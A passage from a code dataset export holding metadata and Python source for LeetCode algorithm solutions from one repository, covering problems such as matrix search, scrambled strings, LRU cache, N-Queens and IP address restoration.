"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1077,
"license_type": "no_license",
"max_line_length": 124,
"num_lines": 40,
"path": "/Search a 2D Matrix.py",
"repo_name": "KnightChan/LeetCode-Python",
"src_encoding": "UTF-8",
"text": "class Solution:\n # @param matrix, a list of lists of integers\n # @param target, an integer\n # @return a boolean\n def searchMatrix(self, matrix, target):\n '''\n Write an efficient algorithm that searches for a value in an m x n matrix. This matrix has the following properties:\n\n Integers in each row are sorted from left to right.\n The first integer of each row is greater than the last integer of the previous row.\n\nFor example,\n\nConsider the following matrix:\n\n[\n [1, 3, 5, 7],\n [10, 11, 16, 20],\n [23, 30, 34, 50]\n]\n\nGiven target = 3, return true.\n '''\n if len(matrix) == 0:\n return False\n m = len(matrix)\n n = len(matrix[0])\n l, r = 0, m * n - 1\n while l <= r:\n mid = (l + r) // 2\n midv = matrix[mid // n][mid % n]\n if l == r:\n return target == midv\n if midv == target:\n return True\n if midv < target:\n l = mid + 1\n else:\n r = mid - 1\n return False\n"
},
{
"alpha_fraction": 0.47955578565597534,
"alphanum_fraction": 0.49570924043655396,
"avg_line_length": 27.314285278320312,
"blob_id": "0ac58a0ac354ab634b8af3bb90b50f1c14429c60",
"content_id": "abeea3100bd6301adf42ef0b228d764196b4734e",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1981,
"license_type": "no_license",
"max_line_length": 124,
"num_lines": 70,
"path": "/Scramble String.py",
"repo_name": "KnightChan/LeetCode-Python",
"src_encoding": "UTF-8",
"text": "class Solution:\n # @return a boolean\n def isScramble(self, s1, s2):\n '''\n Given a string s1, we may represent it as a binary tree by partitioning it to two non-empty substrings recursively.\n\nBelow is one possible representation of s1 = \"great\":\n\n great\n / \\\n gr eat\n / \\ / \\\ng r e at\n / \\\n a t\n\nTo scramble the string, we may choose any non-leaf node and swap its two children.\n\nFor example, if we choose the node \"gr\" and swap its two children, it produces a scrambled string \"rgeat\".\n\n rgeat\n / \\\n rg eat\n / \\ / \\\nr g e at\n / \\\n a t\n\nWe say that \"rgeat\" is a scrambled string of \"great\".\n\nSimilarly, if we continue to swap the children of nodes \"eat\" and \"at\", it produces a scrambled string \"rgtae\".\n\n rgtae\n / \\\n rg tae\n / \\ / \\\nr g ta e\n / \\\n t a\n\nWe say that \"rgtae\" is a scrambled string of \"great\".\n\nGiven two strings s1 and s2 of the same length, determine if s2 is a scrambled string of s1. \n '''\n n = len(s1)\n if n != len(s2):\n return False\n if n == 0:\n return True\n dp = [[[False] * n for col in range(n)] for row in range(n + 1)]\n for i in range(n):\n for j in range(n):\n dp[1][i][j] = (s1[i] == s2[j])\n dp[0][i][j] = True\n for l in range(2, n + 1):\n for i in range(n - l + 1):\n for j in range(n - l + 1):\n for k in range(1, l):\n if (dp[k][i][j] and dp[l-k][i+k][j+k]) \\\n or (dp[k][i][j+l-k] and dp[l-k][i+k][j]):\n dp[l][i][j] = True\n break\n return dp[n][0][0]\n\ns1 = ['rgtae', 'greta']\ns2 = ['at', 'at']\ns3 = [\"pcighfdjnbwfkohtklrecxnooxyipj\", \"npodkfchrfpxliocgtnykhxwjbojie\"]\ns = s3\nprint(len(s[0]), s[0], s[1])\nprint(Solution.isScramble(Solution(), s[0], s[1]))"
},
{
"alpha_fraction": 0.3398374021053314,
"alphanum_fraction": 0.4032520353794098,
"avg_line_length": 31.36842155456543,
"blob_id": "ac0a0e2e55f9de1040db37c183c6836127935271",
"content_id": "00e74bd2051a3853513b3011a265a1ee5fc3a63c",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 615,
"license_type": "no_license",
"max_line_length": 77,
"num_lines": 19,
"path": "/Integer to Roman.py",
"repo_name": "KnightChan/LeetCode-Python",
"src_encoding": "UTF-8",
"text": "class Solution:\n # @return a string\n def intToRoman(self, num):\n '''\n Given an integer, convert it to a roman numeral.\n\nInput is guaranteed to be within the range from 1 to 3999.\n '''\n dic = [[\"M\", 1000], [\"CM\", 900], [\"D\", 500], [\"CD\", 400], [\"C\", 100],\n [\"XC\", 90], [\"L\", 50], [\"XL\", 40], [\"X\", 10],\n [\"IX\", 9], [\"V\", 5], [\"IV\", 4], [\"I\", 1]]\n s = \"\"\n index = 0\n while num > 0:\n while num >= dic[index][1]:\n s += dic[index][0]\n num -= dic[index][1]\n index += 1\n return s\n"
},
{
"alpha_fraction": 0.5549525022506714,
"alphanum_fraction": 0.5881953835487366,
"avg_line_length": 34.95121765136719,
"blob_id": "59c655d5d5b31b0ec6b279494e89e7a5c67b45a7",
"content_id": "d97b6b2dbddca0417902c74757d35cf98799e9a8",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1474,
"license_type": "no_license",
"max_line_length": 112,
"num_lines": 41,
"path": "/Insert Interval.py",
"repo_name": "KnightChan/LeetCode-Python",
"src_encoding": "UTF-8",
"text": "# Definition for an interval.\n# class Interval:\n# def __init__(self, s=0, e=0):\n# self.start = s\n# self.end = e\n\nclass Solution:\n # @param intervals, a list of Intervals\n # @param newInterval, a Interval\n # @return a list of Interval\n def insert(self, intervals, newInterval):\n '''\n Given a set of non-overlapping intervals, insert a new interval into the intervals (merge if necessary).\n\nYou may assume that the intervals were initially sorted according to their start times.\n\nExample 1:\nGiven intervals [1,3],[6,9], insert and merge [2,5] in as [1,5],[6,9].\n\nExample 2:\nGiven [1,2],[3,5],[6,7],[8,10],[12,16], insert and merge [4,9] in as [1,2],[3,10],[12,16].\n\nThis is because the new interval [4,9] overlaps with [3,5],[6,7],[8,10]. \n '''\n i = 0\n while i < len(intervals):\n if intervals[i].end < newInterval.start or newInterval.end < intervals[i].start:\n i += 1\n continue\n newInterval.start = min(newInterval.start, intervals[i].start)\n newInterval.end = max(newInterval.end, intervals[i].end)\n del intervals[i]\n inserted = False\n for i in range(len(intervals)):\n if intervals[i].start >= newInterval.start:\n intervals.insert(i, newInterval)\n inserted = True\n break\n if not inserted:\n intervals.append(newInterval)\n return intervals\n"
},
{
"alpha_fraction": 0.5303030014038086,
"alphanum_fraction": 0.5512820482254028,
"avg_line_length": 30.77777862548828,
"blob_id": "b217ae0c6c8716fe280c1921e776173b3d4a3d7e",
"content_id": "91c9e322937f7356af44f977c1c1e3a24e04ba16",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 858,
"license_type": "no_license",
"max_line_length": 136,
"num_lines": 27,
"path": "/Remove Duplicates from Sorted List II.py",
"repo_name": "KnightChan/LeetCode-Python",
"src_encoding": "UTF-8",
"text": "# Definition for singly-linked list.\n# class ListNode:\n# def __init__(self, x):\n# self.val = x\n# self.next = None\n\nclass Solution:\n # @param head, a ListNode\n # @return a ListNode\n def deleteDuplicates(self, head):\n '''\n Given a sorted linked list, delete all nodes that have duplicate numbers, leaving only distinct numbers from the original list.\n\nFor example,\nGiven 1->2->3->3->4->4->5, return 1->2->5.\nGiven 1->1->1->2->3, return 2->3. \n '''\n dummyHead = ListNode(-1)\n dummyHead.next = head\n t = dummyHead\n while t:\n while t.next and t.next.next and t.next.val == t.next.next.val:\n del_v = t.next.val\n while t.next and t.next.val == del_v:\n t.next = t.next.next\n t = t.next\n return dummyHead.next\n"
},
{
"alpha_fraction": 0.5155367255210876,
"alphanum_fraction": 0.5197740197181702,
"avg_line_length": 25.259260177612305,
"blob_id": "72619a0f4a3f89f9303edf9a3d79567eefd23ee2",
"content_id": "a5e8c2f2f1bde7098a9fe0e1d536302bd258fce7",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 708,
"license_type": "no_license",
"max_line_length": 82,
"num_lines": 27,
"path": "/Anagrams.py",
"repo_name": "KnightChan/LeetCode-Python",
"src_encoding": "UTF-8",
"text": "class Solution:\n # @param strs, a list of strings\n # @return a list of strings\n def anagrams(self, strs):\n '''\n Given an array of strings, return all groups of strings that are anagrams.\n\nNote: All inputs will be in lower-case.\n '''\n hashTable = {}\n for s in strs:\n sorted_s = sorted(s)\n ss = ''.join(sorted_s)\n if ss not in hashTable:\n hashTable[ss] = []\n hashTable[ss].append(s)\n\n res = []\n for s in hashTable:\n if len(hashTable[s]) > 1:\n res += [os for os in hashTable[s]]\n return res\n\ns1 = ['cbad']\ns = s1\nprint(s)\nprint(Solution.anagrams(Solution(), s))"
},
{
"alpha_fraction": 0.42541855573654175,
"alphanum_fraction": 0.4596651494503021,
"avg_line_length": 33.605262756347656,
"blob_id": "767210df6093496d488b621b62493a8962675f7f",
"content_id": "238cf6f71fee042db2a62883c37c5af1ae9731b2",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1314,
"license_type": "no_license",
"max_line_length": 114,
"num_lines": 38,
"path": "/Valid Sudoku.py",
"repo_name": "KnightChan/LeetCode-Python",
"src_encoding": "UTF-8",
"text": "class Solution:\n # @param board, a 9x9 2D array\n # @return a boolean\n def isValidSudoku(self, board):\n '''\n Determine if a Sudoku is valid, according to: Sudoku Puzzles - The Rules.\n\nThe Sudoku board could be partially filled, where empty cells are filled with the character '.'.\n\n\nA partially filled sudoku which is valid.\n\nNote:\nA valid Sudoku board (partially filled) is not necessarily solvable. Only the filled cells need to be validated. \n '''\n row = [set() for i in range(9)]\n col = [set() for i in range(9)]\n cube = [set() for i in range(9)]\n for i in range(9):\n for j in range(9):\n x = board[i][j]\n k = i // 3 * 3 + j // 3\n if x == '.':\n continue\n if x in row[i] or x in col[j] or x in cube[k]:\n return False\n row[i].add(x)\n col[j].add(x)\n cube[k].add(x)\n return True\n\na0 = [\"....9..9.\",\".........\",\"4..89...1\",\"4.3......\",\".........\",\"...5..9..\",\"....1.7..\",\"...4.....\",\".....6...\"]\na1 = [\".87654321\",\"2........\",\"3........\",\"4........\",\"5........\",\"6........\",\"7........\",\"8........\",\"9........\"]\n\na = a1\nfor i in range(9):\n print(a[i])\nprint(Solution.isValidSudoku(Solution(), a))"
},
{
"alpha_fraction": 0.5211267471313477,
"alphanum_fraction": 0.5372233390808105,
"avg_line_length": 28,
"blob_id": "ac0bc736e141af235343648058c0230abb7b1981",
"content_id": "28bcbd74828424078864f604b5917e5ae1884c4b",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 994,
"license_type": "no_license",
"max_line_length": 124,
"num_lines": 34,
"path": "/Swap Nodes in Pairs.py",
"repo_name": "KnightChan/LeetCode-Python",
"src_encoding": "UTF-8",
"text": "# Definition for singly-linked list.\n# class ListNode:\n# def __init__(self, x):\n# self.val = x\n# self.next = None\n\nclass Solution:\n # @param a ListNode\n # @return a ListNode\n def swapPairs(self, head):\n '''\n Given a linked list, swap every two adjacent nodes and return its head.\n\nFor example,\nGiven 1->2->3->4, you should return the list as 2->1->4->3.\n\nYour algorithm should use only constant space. You may not modify the values in the list, only nodes itself can be changed. \n '''\n dummyHead = ListNode(0)\n dummyHead.next = head\n t = dummyHead\n while t:\n n1 = t.next\n if not t.next:\n return dummyHead.next\n n2 = t.next.next\n if not t.next.next:\n return dummyHead.next\n next = t.next.next.next\n n2.next = n1\n n1.next = next\n t.next = n2\n t = n1\n return dummyHead.next\n "
},
{
"alpha_fraction": 0.5796178579330444,
"alphanum_fraction": 0.5881103873252869,
"avg_line_length": 29.7391300201416,
"blob_id": "8b685bc7886415be79466d0d77b35e9a8a21d4a0",
"content_id": "2b1d4134ca8361f6a309ea078de1fb9e6024b661",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1413,
"license_type": "no_license",
"max_line_length": 196,
"num_lines": 46,
"path": "/LRU Cache.py",
"repo_name": "KnightChan/LeetCode-Python",
"src_encoding": "UTF-8",
"text": "class LRUCache:\n \"\"\" Design and implement a data structure for Least Recently Used (LRU) cache. It should support the following operations: get and set.\n\nget(key) - Get the value (will always be positive) of the key if the key exists in the cache, otherwise return -1.\nset(key, value) - Set or insert the value if the key is not already present. When the cache reached its capacity, it should invalidate the least recently used item before inserting a new item. \"\"\"\n\n # @param capacity, an integer\n def __init__(self, capacity):\n self.size = capacity\n self.cache = {}\n self.uselist = []\n\n # @return an integer\n def get(self, key):\n res = self.cache.get(key)\n if res:\n self.usekey(key)\n return res\n else:\n return -1\n\n # @param key, an integer\n # @param value, an integer\n # @return nothing\n def set(self, key, value):\n v = self.cache.get(key)\n if v:\n self.cache[key] = value\n self.usekey(key)\n else:\n if len(self.cache) == self.size:\n okey = self.uselist.pop()\n self.cache.pop(okey)\n self.cache[key] = value\n self.uselist.insert(0, key)\n\n def usekey(self, key):\n self.uselist.remove(key)\n self.uselist.insert(0, key)\n\nss = LRUCache(1)\nss.set(2, 1)\nss.get(2)\nss.set(3,2)\nss.get(2)\nss.get(3)"
},
{
"alpha_fraction": 0.5485770106315613,
"alphanum_fraction": 0.5603532791137695,
"avg_line_length": 26.567567825317383,
"blob_id": "6455634bd24dba09f9ab36550c8aef0bc20b1b69",
"content_id": "76b56eac6bd2c913ccc818d83ee0b2b04f0b430d",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1019,
"license_type": "no_license",
"max_line_length": 181,
"num_lines": 37,
"path": "/ZigZag Conversion.py",
"repo_name": "KnightChan/LeetCode-Python",
"src_encoding": "UTF-8",
"text": "class Solution:\n # @return a string\n def convert(self, s, nRows):\n '''\n The string \"PAYPALISHIRING\" is written in a zigzag pattern on a given number of rows like this: (you may want to display this pattern in a fixed font for better legibility)\n\nP A H N\nA P L S I I G\nY I R\n\nAnd then read line by line: \"PAHNAPLSIIGYIR\"\n\nWrite the code that will take a string and make this conversion given a number of rows:\n\nstring convert(string text, int nRows);\n\nconvert(\"PAYPALISHIRING\", 3) should return \"PAHNAPLSIIGYIR\". \n '''\n if nRows <= 1:\n return s\n interval = 2 * nRows - 2\n res = s[::interval]\n for i in range(1, nRows - 1):\n k = i\n x = interval - 2 * i\n while k < len(s):\n res += s[k]\n k += x\n x = interval - x\n res += s[nRows - 1::interval]\n return res\n\ns0 = \"AB\"\ns1 = \"PAYPALISHIRING\"\ns = s0\nprint(len(s), s)\nprint(Solution.convert(Solution(), s, 1))"
},
{
"alpha_fraction": 0.4385805130004883,
"alphanum_fraction": 0.44949954748153687,
"avg_line_length": 18.625,
"blob_id": "8ffa6d40e214abfd1c63dfbeac0648f0c489c595",
"content_id": "2eb5e55dc796c5d139e18f5ae41596aa50f2bf91",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1099,
"license_type": "no_license",
"max_line_length": 70,
"num_lines": 56,
"path": "/Flatten Binary Tree to Linked List.py",
"repo_name": "KnightChan/LeetCode-Python",
"src_encoding": "UTF-8",
"text": "# Definition for a binary tree node\n# class TreeNode:\n# def __init__(self, x):\n# self.val = x\n# self.left = None\n# self.right = None\n\nclass Solution:\n # @param root, a tree node\n # @return nothing, do it in place\n def flatten(self, root):\n ''' Given a binary tree, flatten it to a linked list in-place.\n\nFor example,\nGiven\n\n 1\n / \\\n 2 5\n / \\ \\\n 3 4 6\n\nThe flattened tree should look like:\n\n 1\n \\\n 2\n \\\n 3\n \\\n 4\n \\\n 5\n \\\n 6\n'''\n self.dfs(root)\n\n def dfs(self, node):\n if not node:\n return node\n if not node.left and not node.right:\n return node\n l = self.dfs(node.left)\n r = self.dfs(node.right)\n if l is None:\n return r\n elif r is None:\n node.right = node.left\n node.left = None\n return l\n else:\n l.right = node.right\n node.right = node.left\n node.left = None\n return r\n"
},
{
"alpha_fraction": 0.4992503821849823,
"alphanum_fraction": 0.517241358757019,
"avg_line_length": 25.68000030517578,
"blob_id": "758b60881e6388b7e1dbc61c5a604d3bab21a122",
"content_id": "fc8b48439881c7fbe584bac08d89457dd2da702e",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1334,
"license_type": "no_license",
"max_line_length": 114,
"num_lines": 50,
"path": "/Path Sum II.py",
"repo_name": "KnightChan/LeetCode-Python",
"src_encoding": "UTF-8",
"text": "# Definition for a binary tree node\n# class TreeNode:\n# def __init__(self, x):\n# self.val = x\n# self.left = None\n# self.right = None\n\nclass Solution:\n # @param root, a tree node\n # @param sum, an integer\n # @return a list of lists of integers\n def pathSum(self, root, sum):\n ''' Given a binary tree and a sum, find all root-to-leaf paths where each path's sum equals the given sum.\nFor example:\nGiven the below binary tree and sum = 22,\n\n 5\n / \\\n 4 8\n / / \\\n 11 13 4\n / \\ / \\\n 7 2 5 1\n\nreturn\n\n[\n [5,4,11,2],\n [5,8,4,5]\n]\n'''\n reslist = []\n self.dfs(root, 0, [], sum, reslist)\n return reslist\n\n def dfs(self, node, cursum, curlist, sum, reslist):\n if node is None:\n return\n if node.left is None and node.right is None:\n if cursum + node.val == sum:\n curlist.append(node.val)\n reslist.append(list(curlist))\n curlist.pop()\n return\n curlist.append(node.val)\n self.dfs(node.left, cursum + node.val, curlist, sum, reslist)\n curlist.pop()\n curlist.append(node.val)\n self.dfs(node.right, cursum + node.val, curlist, sum, reslist)\n curlist.pop()\n"
},
{
"alpha_fraction": 0.4274509847164154,
"alphanum_fraction": 0.45359477400779724,
"avg_line_length": 27.370370864868164,
"blob_id": "ec9cd6558f61676d406c7907865fdef645f5d7df",
"content_id": "cc85c0935a0cbe9e3d6180ce05969ba8ab233419",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 765,
"license_type": "no_license",
"max_line_length": 92,
"num_lines": 27,
"path": "/N-Queens II.py",
"repo_name": "KnightChan/LeetCode-Python",
"src_encoding": "UTF-8",
"text": "#coding:utf-8\nclass Solution:\n # @return an integer\n def totalNQueens(self, n):\n '''\n Follow up for N-Queens problem.\n\nNow, instead outputting board configurations, return the total number of distinct solutions.\n '''\n def dfs(ith, n, lr, rl, ud):\n if ith == n:\n return 1\n ones = (1 << n) - 1\n count = 0\n for i in range(1, n + 1):\n k = 1 << (n - i)\n if (k & lr) + (k & rl) + (k & ud) > 0:\n continue\n count += dfs(ith + 1, n, (lr | k) >> 1, ((rl | k) << 1) & ones, ud | k)\n return count\n return dfs(0, n, 0, 0, 0)\n\nn1 = 12\nn = n1\nprint(n)\nres = Solution.totalNQueens(Solution(), n)\nprint(res)"
},
{
"alpha_fraction": 0.41681259870529175,
"alphanum_fraction": 0.4500875771045685,
"avg_line_length": 21,
"blob_id": "e866acb88ff47edd9eb8a072a55ef26295bc40d4",
"content_id": "2c8af82e6ee116fb81471bc842a19ad51abfe557",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 571,
"license_type": "no_license",
"max_line_length": 96,
"num_lines": 26,
"path": "/Excel Sheet Column Title.py",
"repo_name": "KnightChan/LeetCode-Python",
"src_encoding": "UTF-8",
"text": "class Solution:\n '''\n Given a positive integer, return its corresponding column title as appear in an Excel sheet.\n\nFor example:\n\n 1 -> A\n 2 -> B\n 3 -> C\n ...\n 26 -> Z\n 27 -> AA\n 28 -> AB \n '''\n # @return a string\n def convertToTitle(self, num):\n dic = ['Z']\n for i in range(ord('A'), ord('Z')):\n dic.append(chr(i))\n ans = []\n while num > 0:\n ans.append(dic[num % 26])\n if num % 26 == 0:\n num -= 26\n num //= 26\n return \"\".join(reversed(ans))"
},
{
"alpha_fraction": 0.4053627848625183,
"alphanum_fraction": 0.4250788688659668,
"avg_line_length": 31.512821197509766,
"blob_id": "37eeaf2d747b4e1247d2d9d8d7b9d88d907e055a",
"content_id": "295f876c71cdf8e354677a930a3a2ab47f3005e6",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1268,
"license_type": "no_license",
"max_line_length": 102,
"num_lines": 39,
"path": "/Unique Binary Search Trees II.py",
"repo_name": "KnightChan/LeetCode-Python",
"src_encoding": "UTF-8",
"text": "# Definition for a binary tree node\n# class TreeNode:\n# def __init__(self, x):\n# self.val = x\n# self.left = None\n# self.right = None\n\nclass Solution:\n # @return a list of tree node\n def generateTrees(self, n):\n '''\n Given n, generate all structurally unique BST's (binary search trees) that store values 1...n.\n\nFor example,\nGiven n = 3, your program should return all 5 unique BST's shown below.\n\n 1 3 3 2 1\n \\ / / / \\ \\\n 3 2 1 1 3 2\n / / \\ \\\n 2 1 2 3\n\nconfused what \"{1,#,2,3}\" means? > read more on how binary tree is serialized on OJ.\n '''\n def genTree(l, r):\n if l > r:\n return [None]\n res = []\n for i in range(l, r + 1):\n left = genTree(l, i - 1)\n right = genTree(i + 1, r)\n for j in range(len(left)):\n for k in range(len(right)):\n node = TreeNode(i)\n node.left = left[j]\n node.right = right[k]\n res.append(node)\n return res\n return genTree(1, n)\n"
},
{
"alpha_fraction": 0.5007012486457825,
"alphanum_fraction": 0.5170640349388123,
"avg_line_length": 23.31818199157715,
"blob_id": "8ab03869a7d00d416a338ae70fa49b2861ed1eb3",
"content_id": "8aa1d000c7da33465d574b1bb5ffe8c799e9ddd2",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2139,
"license_type": "no_license",
"max_line_length": 106,
"num_lines": 88,
"path": "/Reverse Nodes in k-Group.py",
"repo_name": "KnightChan/LeetCode-Python",
"src_encoding": "UTF-8",
"text": "# Definition for singly-linked list.\n# class ListNode:\n# def __init__(self, x):\n# self.val = x\n# self.next = None\n\nclass Solution:\n # @param head, a ListNode\n # @param k, an integer\n # @return a ListNode\n def reverseKGroup(self, head, k):\n '''\n Given a linked list, reverse the nodes of a linked list k at a time and return its modified list.\n\nIf the number of nodes is not a multiple of k then left-out nodes in the end should remain as it is.\n\nYou may not alter the values in the nodes, only nodes itself may be changed.\n\nOnly constant memory is allowed.\n\nFor example,\nGiven this linked list: 1->2->3->4->5\n\nFor k = 2, you should return: 2->1->4->3->5\n\nFor k = 3, you should return: 3->2->1->4->5 \n '''\n fast = head\n slow = head\n dummyHead = ListNode(0)\n dummyHead.next = head\n dht = dummyHead\n while fast:\n for i in range(k):\n if not fast:\n dht.next = slow\n return dummyHead.next\n fast = fast.next\n thisk = self.reverseList(slow, fast)\n dht.next = thisk[0]\n dht = thisk[1]\n slow = fast\n return dummyHead.next\n\n def reverseList(self, start, end):\n pre = None\n t = start\n while t != end:\n x = t.next\n t.next = pre\n pre = t\n t = x\n return [pre, start]\n\nclass ListNode:\n def __init__(self, x):\n self.val = x\n self.next = None\n\n def __str__(self):\n # print(\"in str\")\n tmp = self\n strs = []\n while tmp.next is not None:\n strs.append(str(tmp.val) + \"->\")\n tmp = tmp.next\n else:\n strs.append(str(tmp.val) + \";\")\n return \"\".join(strs)\n\n\nin0 = [1, 2, 4, 3, 2]\nin1 = [1, 2, 3]\nin2 = [1]\n\nins = [in1]\n\nfor tin in ins:\n head = ListNode(0)\n tail = head\n for val in tin:\n tail.next = ListNode(val)\n tail = tail.next\n ss = Solution()\n print(len(tin), tin)\n # print(head)\n print(ss.reverseKGroup(head.next, 2))\n print()"
},
{
"alpha_fraction": 0.4084967374801636,
"alphanum_fraction": 0.4444444477558136,
"avg_line_length": 23.5,
"blob_id": "623fbd4737cfd591a09425c5509174d31c68b9b1",
"content_id": "6a2e41c11d633512b0ce48108f6688a87151d5da",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1226,
"license_type": "no_license",
"max_line_length": 71,
"num_lines": 50,
"path": "/Permutation Sequence.py",
"repo_name": "KnightChan/LeetCode-Python",
"src_encoding": "UTF-8",
"text": "#coding:utf-8\nclass Solution:\n # @return a string\n def getPermutation(self, n, k):\n '''\n The set [1,2,3,…,n] contains a total of n! unique permutations.\n\nBy listing and labeling all of the permutations in order,\nWe get the following sequence (ie, for n = 3):\n\n \"123\"\n \"132\"\n \"213\"\n \"231\"\n \"312\"\n \"321\"\n\nGiven n and k, return the kth permutation sequence.\n\nNote: Given n will be between 1 and 9 inclusive.\n '''\n def fac(n):\n ans = 1\n for i in range(1, n + 1):\n ans *= i\n return ans\n def findMthFalse(used, m):\n for i in range(len(used)):\n if not used[i]:\n m -= 1\n if m == 0:\n used[i] = True\n return i\n return -1\n ith = 0\n used = [False] * n\n ans = ''\n nfac = fac(n)\n while ith < n:\n nfac /= n - ith\n ith += 1\n m = (k - 1) // nfac + 1\n k -= (m - 1) * nfac\n ans += chr(findMthFalse(used, m) + 1 + ord('0'))\n return ans\n\ns1 = [3, 4]\ns = s1\nprint(s)\nprint(Solution.getPermutation(Solution(), s[0], s[1]))"
},
{
"alpha_fraction": 0.4420485198497772,
"alphanum_fraction": 0.4652291238307953,
"avg_line_length": 27.106060028076172,
"blob_id": "446813f752723ca39aac60c8ae2e68ead03dc3c1",
"content_id": "50c2d5ddeb71fa9bce3b5c62cbddf00125decb50",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1855,
"license_type": "no_license",
"max_line_length": 133,
"num_lines": 66,
"path": "/Valid Number.py",
"repo_name": "KnightChan/LeetCode-Python",
"src_encoding": "UTF-8",
"text": "class Solution:\n # @param s, a string\n # @return a boolean\n def isNumber(self, s):\n '''\n Validate if a given string is numeric.\n\nSome examples:\n\"0\" => true\n\" 0.1 \" => true\n\"abc\" => false\n\"1 a\" => false\n\"2e10\" => true\n\nNote: It is intended for the problem statement to be ambiguous. You should gather all requirements up front before implementing one. \n '''\n s = s.strip()\n if len(s) == 0:\n return False\n if s[0] in set(['+', '-']):\n s = s[1:]\n eposs = [pos for pos in range(len(s)) if s[pos] == 'e' or s[pos] == 'E']\n if len(eposs) > 1:\n return False\n epos = len(s)\n if len(eposs) == 1:\n epos = eposs[0]\n dotposs = [pos for pos in range(epos) if s[pos] == '.']\n if len(dotposs) > 1:\n return False\n dotpos = epos\n if len(dotposs) == 1:\n dotpos = dotposs[0]\n if epos == len(s) - 1 or epos == 0:\n return False\n first = s\n if epos != len(s):\n first = s[:epos]\n second = s[epos + 1:]\n if second[0] == '+' or second[0] == '-':\n second = second[1:]\n if not second.isdigit():\n return False\n if dotpos != epos:\n firstone = first[:dotpos]\n firsttwo = first[dotpos + 1:]\n if not ((firstone.isdigit() or firstone == '')\n and (firsttwo.isdigit() or firsttwo == '')):\n return False\n if firstone == '' and firsttwo == '':\n return False\n else:\n if not (first == '' or first.isdigit()):\n return False\n return True\n\ns0 = '.e10'\ns1 = \"-1.e10\"\ns2 = \"0\"\ns3 = \" 0.1 \"\ns4 = \"abc\"\ns5 = \"1 a\"\ns6 = \"2e10\"\ns = s0\nprint(s)\nprint(Solution.isNumber(Solution(), s))\n"
},
{
"alpha_fraction": 0.3608340919017792,
"alphanum_fraction": 0.49592021107673645,
"avg_line_length": 30.542856216430664,
"blob_id": "f6b24ef17e368b498d0d3cd038a164299ca2fdb2",
"content_id": "458873ff18f02cd278b90af6ae336bf95acc2977",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1103,
"license_type": "no_license",
"max_line_length": 114,
"num_lines": 35,
"path": "/Restore IP Addresses.py",
"repo_name": "KnightChan/LeetCode-Python",
"src_encoding": "UTF-8",
"text": "class Solution:\n # @param s, a string\n # @return a list of strings\n def restoreIpAddresses(self, s):\n '''\n Given a string containing only digits, restore it by returning all possible valid IP address combinations.\n\nFor example:\nGiven \"25525511135\",\n\nreturn [\"255.255.11.135\", \"255.255.111.35\"]. (Order does not matter) \n '''\n def dfs(s, str, n, now, res):\n if len(str) == 4\\\n or (len(str) == 3 and str > '255')\\\n or (len(str) > 1 and str[0] == '0')\\\n or (s == '' and n != 3)\\\n or (n > 3):\n return\n if s == '':\n res.append(now[1:] + '.' + str)\n return\n dfs(s[1:], str + s[0], n, now, res)\n if str != '':\n dfs(s[1:], s[0], n + 1, now + '.' + str, res)\n res = []\n dfs(s, '', 0, '', res)\n return res\n\ns1 = '25525511135'\ns2 = \"010010\"\ns3 = '111111111111111111111111111111111111111111111111111111111111111111111111111111'\ns = s3\nprint(s)\nprint(Solution.restoreIpAddresses(Solution(), s))"
},
{
"alpha_fraction": 0.4513089060783386,
"alphanum_fraction": 0.49633508920669556,
"avg_line_length": 30.866666793823242,
"blob_id": "1fa43bb736af987797be634c62129282f598ab2f",
"content_id": "a5556e8c5d81cfb909a13589b33b714e4024bc96",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 955,
"license_type": "no_license",
"max_line_length": 99,
"num_lines": 30,
"path": "/Multiply Strings.py",
"repo_name": "KnightChan/LeetCode-Python",
"src_encoding": "UTF-8",
"text": "class Solution:\n # @param num1, a string\n # @param num2, a string\n # @return a string\n def multiply(self, num1, num2):\n '''\n Given two numbers represented as strings, return multiplication of the numbers as a string.\n\nNote: The numbers can be arbitrarily large and are non-negative.\n '''\n a = [ord(c) - ord('0') for c in num1]\n a.reverse()\n b = [ord(c) - ord('0') for c in num2]\n b.reverse()\n c = [0] * (len(a) + len(b))\n for i in range(len(a)):\n for j in range(len(b)):\n c[i + j] += a[i] * b[j]\n for i in range(len(a) + len(b) - 1):\n c[i + 1] += c[i] // 10\n c[i] %= 10\n while len(c) > 1 and c[len(c) - 1] == 0:\n c.pop()\n c.reverse()\n return ''.join([chr(i + ord('0')) for i in c])\n\nnum1 = ['1234567890', '9876543210']\nnum = num1\nprint(num)\nprint(Solution.multiply(Solution(), num[0], num[1]))"
},
{
"alpha_fraction": 0.4746136963367462,
"alphanum_fraction": 0.49558499455451965,
"avg_line_length": 26.454545974731445,
"blob_id": "38e39688735735b39e4e00bd84321f67676d8bea",
"content_id": "4058dabab882346c98e50d1d0870d8b87c2197bf",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 906,
